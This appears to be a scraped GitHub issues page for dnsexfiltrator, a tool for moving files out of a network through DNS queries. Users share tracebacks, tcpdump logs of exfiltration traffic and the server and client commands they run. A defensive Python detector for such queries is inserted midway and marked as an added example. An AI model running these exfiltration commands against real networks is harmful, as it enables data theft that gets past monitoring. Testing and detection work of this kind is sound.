arno0x / dnsexfiltrator
Data exfiltration over DNS request covert channel
I keep getting:
"Traceback (most recent call last):
File "./dnsexfiltrator.py", line 144, in
request = DNSRecord.parse(data)
File "/usr/lib/python2.7/dist-packages/dnslib/dns.py", line 104, in parse
questions.append(DNSQuestion.parse(buffer))
File "/usr/lib/python2.7/dist-packages/dnslib/dns.py", line 645, in parse
buffer.offset,e))
dnslib.dns.DNSError: Error unpacking DNSQuestion [offset=55]: Invalid label < lets>"
Any idea how to fix?
Hello, thank you for your fantastic work!
I found that the server sometimes dies, and I believe that it is because of receiving bogus DNS data such as:
[1] DNS requests which are generated by others
[2] Duplicated DNS records
For example, I saw the following:
# ./dnsexfiltrator.py -d ****** -p ******
[*] DNS server listening on port 53
[+] Received query: [init.RE5TRXhmaWwudHh0fDU.******.net.] - Type: [16]
[+] Receiving file [DNSExfil.txt] as a ZIP file in [5] chunks
[+] Received query: [ns2.******.net.] - Type: [28]
[!] Stopping DNS Server
Traceback (most recent call last):
File "./dnsexfiltrator.py", line 156, in <module>
chunkNumber, rawData = msg.split('.',1)
ValueError: need more than 1 value to unpack
# ./dnsexfiltrator.py -d ****** -p ******
[*] DNS server listening on port 53
[+] Received query: [69.nyXdZj07A7zOWKcGeITueGkSvETv4CReY6tVOJLELarJlE4Lcs.******.net.] - Type: [16]
[!] Stopping DNS Server
Traceback (most recent call last):
File "./dnsexfiltrator.py", line 173, in <module>
if chunkIndex == nbChunks:
NameError: name 'nbChunks' is not defined
The tcpdump is here:
09:08:00.560297 IP 54.***.***.196.49148 > 172.***.***.88.53: 464% [1au] AAAA? ns1.******.net. (54)
09:08:00.560314 IP 54.***.***.196.18018 > 172.***.***.88.53: 33279% [1au] AAAA? ns2.******.net. (54)
09:08:00.563451 IP 52.***.***.101.22503 > 172.***.***.88.53: 39347% [1au] AAAA? ns1.******.net. (54)
09:08:00.563464 IP 52.***.***.101.16777 > 172.***.***.88.53: 23126% [1au] AAAA? ns2.******.net. (54)
09:08:00.563546 IP 52.***.***.101.13240 > 172.***.***.88.53: 27581% [1au] TXT? 0.S6GMbKdnhmKG72XDoUUIHNeWeHCAjxYZzICr9YNGDK55zXd-Q6gUwsoTpFBN8Bo.KtcPvGtNqHw3D8CA93Gubwldn2xYZ_IIRqib-qDBcL2uDB43ZBEvLfrQLb2Ll0e.2gsfvaPbZD6XrKVmgI8lfcHC-eAR1mFNSN62LiaF7KRjAE-L3Q6FmeoCu3a56Ji.FIZKR-KMGj1Zttm7NlepW5zURsfU3.******.net. (274)
09:08:00.571530 IP 54.***.***.207.19137 > 172.***.***.88.53: 43369% [1au] AAAA? ns2.******.net. (54)
09:08:00.577745 IP 13.***.***.85.59518 > 172.***.***.88.53: 54284% [1au] TXT? 0.S6GMbKdnhmKG72XDoUUIHNeWeHCAjxYZzICr9YNGDK55zXd-Q6gUwsoTpFBN8Bo.KtcPvGtNqHw3D8CA93Gubwldn2xYZ_IIRqib-qDBcL2uDB43ZBEvLfrQLb2Ll0e.2gsfvaPbZD6XrKVmgI8lfcHC-eAR1mFNSN62LiaF7KRjAE-L3Q6FmeoCu3a56Ji.FIZKR-KMGj1Zttm7NlepW5zURsfU3.******.net. (274)
09:08:00.717056 IP 13.***.***.172.49485 > 172.***.***.88.53: 28854% AAAA? ns2.******.net. (43)
09:08:00.717087 IP 13.***.***.172.64431 > 172.***.***.88.53: 12666% AAAA? ns1.******.net. (43)
^C
In this case, the DNS records that start with "ns1" and "ns2" seem to trigger the error.
So I added the following:
if qname.startswith("ns"):
    continue
But it should not be enough ...
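Seen from the monitoring side, the log above shows the query naming a detector can key on: TXT queries whose first label is `init` or a chunk number, followed by base64url labels, interleaved with ordinary resolver lookups and the same chunk repeated through a second resolver. The following is an added example, not part of the original post or the project's code; the `example.net` zone, the two-label zone assumption, the `MIN_PAYLOAD` threshold and all sample payloads are constructed.

```python
import re
from collections import defaultdict

B64URL = re.compile(r"[A-Za-z0-9_-]+")   # alphabet visible in the logged labels
MIN_PAYLOAD = 24                          # assumed threshold, tune per environment

def classify(qname, qtype, zone_labels=2):
    """Match the naming seen in the post: init.<b64url>.<zone> or
    <number>.<b64url labels>.<zone>, TXT only. zone_labels=2 is an assumption."""
    labels = qname.rstrip(".").split(".")
    if qtype != "TXT" or len(labels) < zone_labels + 2:
        return None                       # e.g. the AAAA lookups for ns1/ns2
    zone = ".".join(labels[-zone_labels:]).lower()
    head, payload = labels[0], labels[1:-zone_labels]
    if not all(B64URL.fullmatch(p) for p in payload):
        return None
    if head == "init":
        return zone, "init", "".join(payload)
    if re.fullmatch(r"[0-9]+", head) and sum(map(len, payload)) >= MIN_PAYLOAD:
        return zone, "chunk", int(head)
    return None

def summarize(queries):
    """Per zone: init queries seen, distinct chunk numbers, repeated chunks."""
    report = defaultdict(lambda: {"init": 0, "chunks": set(), "repeats": 0})
    for qname, qtype in queries:
        hit = classify(qname, qtype)
        if hit is None:
            continue
        zone, kind, key = hit
        entry = report[zone]
        if kind == "init":
            entry["init"] += 1
        elif key in entry["chunks"]:
            entry["repeats"] += 1         # same chunk relayed by another resolver
        else:
            entry["chunks"].add(key)
    return dict(report)

# Constructed sample queries shaped like the log lines in the post.
CHUNK0 = "A1b2C3d4-E5f6_G7h8" * 3
CHUNK1 = "Zz9Yy8Xx7-Ww6Vv5_Uu4" * 2
SAMPLE_QUERIES = [
    ("ns1.example.net.", "AAAA"), ("ns2.example.net.", "AAAA"),
    ("init.RE5TRXhmaWwudHh0fDU.example.net.", "TXT"),
    ("0." + CHUNK0 + ".example.net.", "TXT"),
    ("0." + CHUNK0 + ".example.net.", "TXT"),   # duplicate via a second resolver
    ("1." + CHUNK1 + ".example.net.", "TXT"),
    ("selector1._domainkey.example.org.", "TXT"),   # benign TXT lookup
]
```
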
The choice between RC4 and AES is not just a matter of taste. RC4 has serious vulnerabilities and is deprecated by RFC 7465, published three years ago. https://www.rfc-editor.org/rfc/rfc7465.txt
Hi, I really appreciate that you created such tools so that I could test DNS security.
I have downloaded this file and have a kind of issue.
I have also seen the same issue on this GitHub page.
However, I really don't know how to solve this.
Here is my environment:
My question is this:
Did I configure something wrong?
Do I have to own a name server for the NS record? (because I don't own the name server but AWS owns it)
Thank you for your effort,
Best regards.
It would be great to have an option to use/support different versions of .NET, even at the cost of not compressing files
Hello,
First of all, many thanks for your efforts and help.
I keep getting this message "DNS name doesn't exist"; however, my DNS and Google DNS can resolve mydomain.com with no issues and the NS record is pointing to my Kali machine.
Is there anything missing, please? By the way, I'm using Win10 as the source and Kali with Python 2.7 as the target.
Hello,
The transferred data cannot be unzipped, or is corrupted? Using Invoke-DNSExfiltrator.ps1.
unzip test.txt.zip
Archive: test.txt.zip
End-of-central-directory signature not found. Either this file is not
a zipfile, or it constitutes one disk of a multi-part archive. In the
latter case the central directory and zipfile comment will be found on
the last disk(s) of this archive.
unzip: cannot find zipfile directory in one of test.txt.zip or
test.txt.zip.zip, and cannot find test.txt.zip.ZIP, period.
file test.txt.zip
test.txt.zip: data
The file is not a zip file. How can I see the data exfiltrated or transferred? Thanks.
I am using PowerShell.
I have an EC2 virtual machine on Amazon which is running Kali Linux, and I am doing the same steps with the same domain specified in the server and the client.
Server : .\dnsexfiltrator.py -d mydomain.com -p password
Client : ./DNSExfiltrator.exe c:\users\root\Desktop\DNSExfiltrator-master\test1.png mydomain.com password s=ip of my ec2 machine t=1000
I also tried to put the domain name of the EC2 machine but it didn't recognize it.
Your help will be highly appreciated as I have an exfiltration at a customer site and I need to use this tool.
Best Regards